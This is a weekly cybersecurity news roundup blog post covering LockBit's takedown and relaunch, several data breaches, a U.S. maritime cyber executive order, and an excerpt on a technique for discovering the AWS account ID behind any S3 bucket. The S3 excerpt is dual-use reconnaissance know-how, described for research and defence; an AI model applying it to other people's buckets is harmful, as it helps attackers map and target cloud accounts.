Blog

This Week in Cybersecurity News – 2/26/24 – Lockbit ?.0 Edition

14 minute read

  • Nathan Burke

Research and surveys

Report: Manufacturing bears the brunt of industrial ransomware

By Christian Vasquez – Cyberscoop

The ransomware variant LockBit is responsible for 25% of ransomware incidents affecting industrial systems tracked by cybersecurity firm Dragos.

Manufacturing continues to be the industrial sector hardest hit by ransomware, according to a new report by industrial cybersecurity firm Dragos.

The firm’s year-in-review reported more than 900 ransomware incidents hitting industrial organizations last year, a dramatic increase compared to 2022. Industrial organizations are often targeted both because of lax defenses and the significant costs incurred by any impact to operations — making the sector a ripe target for digital extortion.

“We saw about a 50% increase for the previous year in the number of ransomware attacks on industrial organizations,” Robert M. Lee, the CEO and founder of Dragos, told reporters ahead of the report’s release.

The vast majority of those incidents were in the manufacturing sector. Out of 905 ransomware incidents Dragos tracked, 638, or 70%, affected the manufacturing sector.


New Cybereason ‘True Cost to Business Study 2024’ Reveals it Still Doesn’t Pay to Pay

IT Security Gurus

Cybereason has today announced the results of their third annual ransomware study, commissioned to better understand the true impact of ransomware to businesses. This global study reveals ransomware attacks are becoming more frequent, effective, and sophisticated:

  • 56 percent of organisations surveyed suffered more than one ransomware attack in the last 24 months.
  • It still ‘doesn’t pay to pay’ as almost 80 percent of organisations who paid the ransom were hit a second time
  • 82 percent were hit again within a year
  • 63 percent were asked to pay again

The report ‘Ransomware: The True Cost to Business 2024’ further revealed that of the organisations who opted to pay a ransom in return for their encrypted systems, only 47 percent received their data and solutions back uncorrupted. These findings emphasize why it does not pay to pay ransomware attackers, and organisations should instead focus on detection and prevention tactics to end ransomware attacks before material damage occurs.

Lockbit Is So Hot Right Now

Reports of Lockbit’s demise have been overstated, apparently, as they’re all over the news today after they resurfaced following last week’s takedown.

LockBit Ransomware Gang Resurfaces With New Site

by Ionut Arghire – SecurityWeek

The LockBit ransomware operators announce a new leak site as they try to restore credibility after law enforcement takedown.

The LockBit ransomware operators launched a new leak site over the weekend, claiming they restored their infrastructure following a law enforcement takedown and invited affiliates to re-join the operation.

On February 19, LockBit was severely disrupted by law enforcement in North America, Europe, and Asia, which seized 34 servers, took over the group’s Tor-based leak sites, froze cryptocurrency accounts, and harvested technical information on the RaaS.

Authorities also announced that they obtained 1,000 decryption keys that will help victim organizations to recover their data without paying a ransom, and that two individuals suspected of being involved in the operation were arrested.

Shortly after, the US government announced a $10 million reward for information on LockBit leaders and a $5 million reward for information on affiliates, along with charges and sanctions against two Russian nationals believed to be associated with LockBit.

Authorities said they gained “unprecedented and comprehensive access to LockBit’s systems” and, to taunt the operators, they replaced existing posts on the seized leak site with messages containing reports on the group’s activities, information on arrests, details on rewards and sanctions, and even suggesting they know who the LockBit leader is and that he “has engaged with law enforcement”.

Over the weekend, an individual involved with the RaaS, who uses the moniker of “LockBitSupp”, launched a new leak site that lists hundreds of victim organizations and which contains a long message providing his view on the takedown.

According to LockBitSupp, a PHP flaw led to the seizure of the vulnerable sites, but not of those not running the scripting language. In fact, some of the group’s known mirror sites are now linking to the new portal.


LockBit ransomware returns, restores servers after police disruption

By Ionut Ilascu BleepingComputer

The LockBit gang is relaunching its ransomware operation on a new infrastructure less than a week after law enforcement hacked their servers, and is threatening to focus more of their attacks on the government sector.

In a message under a mock-up FBI leak – specifically to draw attention, the gang published a lengthy message about their negligence enabling the breach and the plans for the operation going forward.

LockBit ransomware continues attacks

On February 19, authorities took down LockBit’s infrastructure, which included 34 servers hosting the data leak website and its mirrors, data stolen from the victims, cryptocurrency addresses, decryption keys, and the affiliate panel.

Five days later, LockBit is back and provides details about the breach and how they’re going to run the business to make their infrastructure more difficult to hack.

Immediately after the takedown, the gang confirmed the breach saying that they lost only the servers running PHP and that backup systems without PHP were untouched.

On Saturday, LockBit announced it was resuming the ransomware business and released damage control communication admitting that “personal negligence and irresponsibility” led to law enforcement disrupting its activity in Operation Cronos.

The gang kept the brand name and moved its data leak site to a new .onion address that lists five victims with countdown timers for publishing stolen information.

Outdated PHP server

LockBit says that law enforcement, to which they refer collectively as the FBI, breached two main servers “because for 5 years of swimming in money I became very lazy.”

“Due to my personal negligence and irresponsibility I relaxed and did not update PHP in time.” The threat actor says that the victim’s admin and chat panels server and the blog server were running PHP 8.1.2 and were likely hacked using a critical vulnerability tracked as CVE-2023-3824.

LockBit says they updated the PHP server and announced that they would reward anyone who finds a vulnerability in the latest version.

Speculating on the reason “the FBI” hacked their infrastructure, the cybercriminal says that it was because of the ransomware attack on Fulton County in January, which posed the risk of leaking information with “a lot of interesting things and Donald Trump’s court cases that could affect the upcoming US election.”

Read the Full Story Here…..


FBI’s LockBit Takedown Postponed a Ticking Time Bomb in Fulton County, Ga.

By Brian Krebs – Krebs on Security

The FBI’s takedown of the LockBit ransomware group last week came as LockBit was preparing to release sensitive data stolen from government computer systems in Fulton County, Ga. But LockBit is now regrouping, and the gang says it will publish the stolen Fulton County data on March 2 unless paid a ransom. LockBit claims the cache includes documents tied to the county’s ongoing criminal prosecution of former President Trump, but court watchers say teaser documents published by the crime gang suggest a total leak of the Fulton County data could put lives at risk and jeopardize a number of other criminal trials.

A new LockBit website listing a countdown timer until the promised release of data stolen from Fulton County, Ga.

In early February, Fulton County leaders acknowledged they were responding to an intrusion that caused disruptions for its phone, email and billing systems, as well as a range of county services, including court systems.

On Feb. 13, the LockBit ransomware group posted on its victim shaming blog a new entry for Fulton County, featuring a countdown timer saying the group would publish the data on Feb. 16 unless county leaders agreed to negotiate a ransom.

“We will demonstrate how local structures negligently handled information protection,” LockBit warned. “We will reveal lists of individuals responsible for confidentiality. Documents marked as confidential will be made publicly available. We will show documents related to access to the state citizens’ personal data. We aim to give maximum publicity to this situation; the documents will be of interest to many. Conscientious residents will bring order.”

Yet on Feb. 16, the entry for Fulton County was removed from LockBit’s site without explanation. This usually only happens after the victim in question agrees to pay a ransom demand and/or enters into negotiations with their extortionists.

However, Fulton County Commission Chairman Robb Pitts said the board decided it “could not in good conscience use Fulton County taxpayer funds to make a payment.”

“We did not pay nor did anyone pay on our behalf,” Pitts said at an incident briefing on Feb. 20.

Just hours before that press conference, LockBit’s various websites were seized by the FBI and the U.K.’s National Crime Agency (NCA), which replaced the ransomware group’s homepage with a seizure notice and used the existing design of LockBit’s victim shaming blog to publish press releases about the law enforcement action.

Read the Full Story Here….

Breaches and hacks

U-Haul tells 67K customers that cyber-crooks drove away with their personal info

By Jessica Lyons – TheRegister

U-Haul is alerting tens of thousands of folks that miscreants used stolen credentials to break into one of its systems and access customer records that contained some personal data.

A U-Haul spokesperson told The Register that about 67,000 customers in the United States and Canada were affected, but declined to answer other questions about the security snafu.

The intrusion happened on December 5, according to letters going out this week to those affected. After investigating the break-in with the help of an outside cybersecurity firm, the moving and truck rental giant determined crooks accessed its U-Haul Dealer and Team Members system used to track reservations and view customer records.

These customers’ records contained personal information, including names, dates of birth, and driver license numbers. No financial information was stolen, according to U-Haul.

“The customer record system that was involved is not part of our payment system,” the biz said in its notification letter [PDF]. “No payment card data was involved.”

U-Haul says it hardened its security systems to help prevent future breaches. Specifically, this included changing passwords on compromised accounts and offering affected customers a free, one-year membership with Experian IdentityWorks Credit 3B.


230k Individuals Impacted by Data Breach at Australian Telco Tangerine

By Ionut Arghire – SecurityWeek

Tangerine Telecom says attackers stole the personal information of 230,000 individuals from a legacy customer database.

Australian telecommunications provider Tangerine this week announced that the personal information of 230,000 individuals was stolen in a recent cyberattack.

The incident occurred on February 18 but was not discovered until two days later. The attackers, Tangerine said, accessed a legacy customer database containing the information of roughly 230,000 current and former customer accounts.

The compromised personal information includes names, addresses, dates of birth, email addresses, mobile phone numbers, and Tangerine account numbers.

“We can confirm that no credit or debit card numbers have been compromised, as we do not store this information. No driver’s license numbers, ID documentation details, banking details or passwords have been disclosed as a result of this incident,” the company said in an incident notification.

According to Tangerine, the attackers appear to have accessed the database using the login credentials of a contractor.

To contain the incident, the telecommunications services provider revoked network and system access for the compromised account, removed access to the database, and “changed all other team usernames and passwords”.

The incident, the company said, did not impact its services, nor customer accounts, which are protected with multi-factor authentication (MFA).

Tangerine started notifying the impacted individuals on February 21, encouraging them to stay vigilant on scams and other cyber issues and to report any incident.


A Cyber Attack Hit the Royal Canadian Mounted Police

By Pierluigi Paganini – SecurityAffairs

A cyber attack hit the Royal Canadian Mounted Police (RCMP), the federal and national law enforcement agency of Canada.

The Royal Canadian Mounted Police (RCMP), the federal and national law enforcement agency of Canada, confirmed that it was the target of a cyber attack. RCMP also notified the Office of the Privacy Commissioner (OPC).

The police have launched an investigation into the cyber attack and urged its staff to stay vigilant.

“The situation is evolving quickly but at this time, there is no impact on RCMP operations and no known threat to the safety and security of Canadians,” a spokesperson for the RCMP said in a statement issued to CBC News. “While a breach of this magnitude is alarming, the quick work and mitigation strategies put in place demonstrate the significant steps the RCMP has taken to detect and prevent these types of threats.”

The RCMP said that it is not aware of any impact on foreign police and intelligence services.

The Canadian law enforcement agency did not provide details about the cyber attack.

In November 2023, the Canadian government disclosed a data breach after threat actors hacked two of its contractors.

The Canadian government declared that two of its contractors, Brookfield Global Relocation Services (BGRS) and SIRVA Worldwide Relocation & Moving Services, have been hacked, resulting in the exposure of sensitive information belonging to an undisclosed number of government employees.

Data belonging to current and former Government of Canada employees, members of the Canadian Armed Forces and Royal Canadian Mounted Police personnel have been also exposed.

See also: BleepingComputer


Insomniac Games alerts employees hit by ransomware data breach

by Sergiu Gatlan – BleepingComputer

Sony subsidiary Insomniac Games is sending data breach notification letters to employees whose personal information was stolen and leaked online following a Rhysida ransomware attack in November.

The California-based video game developer has been part of Sony Interactive Entertainment’s Worldwide Studios division (now known as PlayStation Studios) after being acquired by Sony in August 2019.

The gaming studio’s most recent project is Marvel’s Spider-Man 2, released for PlayStation 5, and is currently working on Marvel’s Wolverine for the same platform.

In December, Sony said they were investigating the Rhysida ransomware gang’s claims that they breached Insomniac Games and stole over 1.3 million files from its network.

After negotiations failed when the game studio refused to pay the $2 million ransom, Rhysida dumped 1,67 TB of documents on its dark web leak site.

“We are saddened and angered about the recent criminal cyberattack on our studio and the emotional toll it’s taken on our dev team,” the studio said in a statement published on Twitter after the leak.

“We are aware that the stolen data includes personal information belonging to our employees, former employees, and independent contractors.”

The leaked files include many ID scans and internal documents, such as contract information and licensing agreements with Marvel and Nvidia, as well as screenshots of Insomniac Games’ upcoming Wolverine game.

As claimed on Rhysida’s site, the threat actors have only leaked 98% of the files they stole from the studio after selling the rest to the highest bidder.

US Government Cybersecurity News

Biden signs executive order to give Coast Guard added authority over maritime cyber threats

By Christian Vasquez – Cyberscoop

National security officials have been sounding the alarm over a China-linked hacking group that’s been targeting critical infrastructure.

President Joe Biden issued an executive order Wednesday morning aimed at increasing the defenses of maritime ports through additional authorities to the Coast Guard and started a rulemaking process to add cyber requirements for the sector.

The executive order will give the Coast Guard the authority to respond to cybersecurity incidents while requiring the maritime sector to beef up digital defenses and to report cyber incidents to the Coast Guard. The administration will also invest over $20 billion in port infrastructure over five years.

“The continuity of their operations has a clear and direct impact on the success of our country, our economy and our national security. And that’s why the Biden administration is taking a series of actions to strengthen the cybersecurity of our nation’s ports to not just shore up our cyber defenses, but fortify our supply chains and deliver for the American people,” Anne Neuberger, deputy national security advisor for cyber and emerging technology, said during a media briefing Tuesday.

The order follows a series of warnings from U.S. national security officials over a China-linked hacking group called Volt Typhoon that has successfully targeted critical infrastructure sectors around the U.S. like the maritime sector. China has an outsized influence in U.S. ports, with companies that own almost 80% of ship-to-shore cranes — the giant cranes that load and unload shipping containers at docks.

“America’s system of ports and waterways accounts for over $5.4 trillion of our nation’s annual economic activity, and our ports serve as a gateway for over 90% of all overseas trade,” Rear Adm. Jay Vann, commander of the U.S. Coast Guard Cyber Command, said during the briefing. “Any disruption to the [maritime transportation system], whether manmade or natural, physical or in cyberspace has the potential to cause cascading impacts to our domestic or global supply chains.”

The executive order amends federal legislation to give the Coast Guard the authority to control the movement of vessels that present a cyber threat, requiring maritime facilities to shore up their defenses if they fall below a baseline standard, and inspect vessels and waterfront facilities.

The Coast Guard is also issuing a nonpublic maritime security directive that requires cranes manufactured by China to face “a number of security requirements,” Vann said. Cranes that are able to be operated remotely could potentially leave them vulnerable to hackers, Vann said. However, Neuberger noted that “rip and replace” requirements are currently not being considered by the administration.

The notice of proposed rulemaking, meanwhile, is over mandatory cybersecurity regulations and is based on the Cybersecurity and Infrastructure Security Agency’s cross-sector cybersecurity performance goals, Vann said.

However, these actions began before the recent Volt Typhoon campaign. Neuberger said that the executive order and proposed rulemaking has been in the works for almost 18 months.

See Also: TheRegister

Featured Podcast

Throwing Darts in the Dark With Microsoft Incident Response

On this week’s episode of The Microsoft Threat Intelligence Podcast, Sherrod DeGrippo is joined by Stella Aghakian and Holly Burmaster. They explore the intrigue of watching threat actors and their techniques and walk through these techniques and how they are educational and critical in threat intelligence work. They also discuss their experiences at Microsoft Ignite, insights into the cyber threat actor Octo Tempest, and personal reflections on threat intelligence and favorite threat actors. Both Stella and Holly discuss how they thrive on the uncertainty and variety of their work despite the long hours and high pressure but appreciate the supportive team environment that helps them.

In this episode you’ll learn:

  • Challenges of incident response when dealing with destructive threat actors
  • Difficulty in managing the emotional aspects of incident response
  • The unpredictability and dynamic nature of incident response work

Some questions we ask:

  • How is the workflow structured in incident response teams?
  • What traits are crucial for excelling in the high-pressure world of incident response?
  • Do Dart and Mystic teams collaborate in incident responses?

Opinion

Security is hard because it has to be right all the time? Yeah, like everything else

By Larry Peterson – TheRegister

It takes only one bottleneck or single point of failure to ruin your week

SYSTEMS APPROACH One refrain you often hear is that security must be built in from the ground floor; that retrofitting security to an existing system is the source of design complications, or worse, outright flawed designs.

While it is the case that the early internet was largely silent on the question of security, I suspect “retrofitting” is often used pejoratively. Certainly there have been convoluted and short-sighted attempts to improve security, but the internet has also evolved to include a sound architecture for securing end-to-end communication. Focusing on stopgap mechanisms is never a good recipe for understanding the underlying principles, no matter what aspect of a system one is talking about.

Read the Full Story

Didn’t fit anywhere else

How to find the AWS Account ID of any S3 Bucket

By Sam Cox – Tracebit

In 2021 Ben Bridts published a highly inventive method for finding the AWS Account ID of a public S3 bucket.

This post describes a technique to find the Account ID of any S3 bucket (both private and public).

I’d highly recommend reading Ben’s technique first as we will re-use a lot of concepts.

S3 Bucket to AWS Account ID

Shell output can be worth a thousand words, here’s what our technique enables – finding the previously unknown AWS Account ID for the bucket bucket-alpha:

sh-5.2$ python3 find-s3-account.py bucket-alpha

VPC endpoint vpce-0e76855aadb0dafb5 policy already configured
Requesting bucket-alpha using session name 0-----------
Requesting bucket-alpha using session name 1-----------
Requesting bucket-alpha using session name 2-----------
Requesting bucket-alpha using session name 3-----------

SNIP

Requesting bucket-alpha using session name -----------7
Requesting bucket-alpha using session name -----------8
Requesting bucket-alpha using session name -----------9
Finding session names which passed the VPC endpoint in CloudTrail...
Found -----------1 for bucket-alpha in CloudTrail
Found ---------1-- for bucket-alpha in CloudTrail
Found --------9--- for bucket-alpha in CloudTrail
Found -----6------ for bucket-alpha in CloudTrail
Found --3--------- for bucket-alpha in CloudTrail
Found -2---------- for bucket-alpha in CloudTrail
Found 1----------- for bucket-alpha in CloudTrail
Found ----------0- for bucket-alpha in CloudTrail
Found -------8---- for bucket-alpha in CloudTrail
Found ------7----- for bucket-alpha in CloudTrail
Found ----5------- for bucket-alpha in CloudTrail
Found ---4-------- for bucket-alpha in CloudTrail
Bucket bucket-alpha: 123456789101

How exactly does this work?

When exploring possibilities for this technique, I started by breaking down exactly why Ben’s method works. There are three key elements which combine to make it work:

  1. The ability to apply an IAM policy to the request
    In the Ben’s technique, this is achieved by applying a custom policy when assuming the role.
  2. The ability to infer whether this IAM policy permitted the request or not
    In the case of public buckets, this is quite simple. If our policy blocked the request, the request will fail with AccessDenied. Otherwise, the request will succeed as expected with requests to public buckets.
  3. The ability to apply a wildcard match on the s3:ResourceAccount condition key
    This allows us to discover the Account ID incrementally, one digit at a time, reducing the search space from trillions to hundreds.

A solution

After exploring a few different ideas, I found a solution which works. It involves using a VPC Endpoint for S3, and a difference of behaviour in CloudTrail when a request is denied by a VPC Endpoint policy.

  1. The ability to apply an IAM policy to the request
    Creating a VPC Endpoint of type “Interface” for S3 will allow us to apply an IAM policy to the request. This policy intersects with the other policies which apply to the request (e.g. the bucket policy, the IAM policy of the principal making the request etc) when the request is made through the VPC Endpoint.
  2. The ability to infer whether this IAM policy permitted the request or not
    As the target bucket is owned by a third party and is a private bucket, we’re (thankfully) going to receive an AccessDenied response, regardless of whichever policies we apply to the request. However, we can infer whether the VPC Endpoint policy blocked or permitted the request by whether it appears in our own CloudTrail logs.
    – If the request does appear in our CloudTrail logs, it was permitted by our VPC Endpoint policy but blocked as expected by the bucket policy.
    – If the request does not appear in our CloudTrail logs, it was blocked by our VPC Endpoint policy.
  3. The ability to apply a wildcard match on the s3:ResourceAccount condition key

We can use the full power of IAM policy conditions, including StringLike wildcards and resource condition keys in a VPC Endpoint policy, so the same basic technique will work here.

Read the Full Story Here

Author

Cybersecurity News

More like this

Blog

Transforming Threat Intelligence: Nagomi Security and CrowdStrike Unite for Next-Level Defense

FacebookLinkedInTweetEmail According to Gartner, through 2028, more than 60% of security incidents will be traced to ...

Read the post: Transforming Threat Intelligence: Nagomi Security and CrowdStrike Unite for Next-Level Defense

Blog

Prioritizing MITRE ATT&CK Techniques for Remote Services

FacebookLinkedInTweetEmail The fifth, and final, in a five part series exploring how security teams can identify ...

Read the post: Prioritizing MITRE ATT&CK Techniques for Remote Services

Blog

Announcing the New “Threats in the News” Feature in Nagomi – Adding Context to Operationalize End-to-End Exposure Management

FacebookLinkedInTweetEmail Nagomi’s new “Threats in the News” feature is transforming the way cybersecurity teams manage and ...

Read the post: Announcing the New “Threats in the News” Feature in Nagomi – Adding Context to Operationalize End-to-End Exposure Management